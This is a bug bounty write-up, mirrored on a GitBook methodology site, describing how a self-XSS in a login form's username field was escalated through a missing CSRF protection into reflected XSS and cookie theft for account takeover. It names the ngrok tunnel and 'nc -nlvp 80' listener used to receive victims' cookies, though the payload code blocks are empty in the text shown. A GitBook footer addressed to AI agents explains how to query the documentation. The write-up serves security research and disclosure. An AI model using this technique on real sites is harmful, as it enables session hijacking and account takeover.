> For the complete documentation index, see [llms.txt](https://methodological-notes.gitbook.io/methodology/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://methodological-notes.gitbook.io/methodology/recon-strategies-by-other-hackers/from-self-xss-to-account-take-over-ato.md). # From Self XSS to Account Take Over(ATO)
Hello there , I’m Mostafa Elguerdawi, Today , I would like to share about one of my recent finding in [HackerOne](https://medium.com/u/6f816e37be2c?source=post_page-----812c194b61cf--------------------------------) ‘s program Let’s say : https\://[reacted.com](https://reacted.com./) When I’m testing on this site, there is a login function, as normal I tried login bypass using Response Manipulation, Default Credentials, and SQL Injection. but nothing work, I decided to examine the source code and found of the username that I entered a little while ago printed inside the value attribute.
I thought about trying an XSS injection so, I attempted to inject a double quote(“) within the username, I found that there is no filtering on it.
So, I thought about injecting ‘<’, which might also work.
Indeed, it worked! So, I attempted to injecting a complete payload : ``` "> ``` And it also succeeded!
Unfortunately, this is a self-XSS ## Escalation phase I ran my Burp Suite and intercepted the request during the login attempt.
From the request, I noticed that there is no protection against CSRF, which is expected from a login function. I attempted to escalate the self-XSS to reflected XSS using CSRF. The payload used : ```
```
Yes, it worked! with the help of ngrok, I managed to obtain anyone’s cookies I opened two terminal tabs first : ngrok http 80
second : sudo nc -nlvp 80
I used this payload in username : > *\"\ > \\ \"* *\"\ : is a double quote and white space encoded in html* This payload retrieves the user’s cookies and sends them to me. With the help of netcat(nc), I can obtain these cookies. final payload : ```
```
Finally, I managed to obtain the cookies. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://methodological-notes.gitbook.io/methodology/recon-strategies-by-other-hackers/from-self-xss-to-account-take-over-ato.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.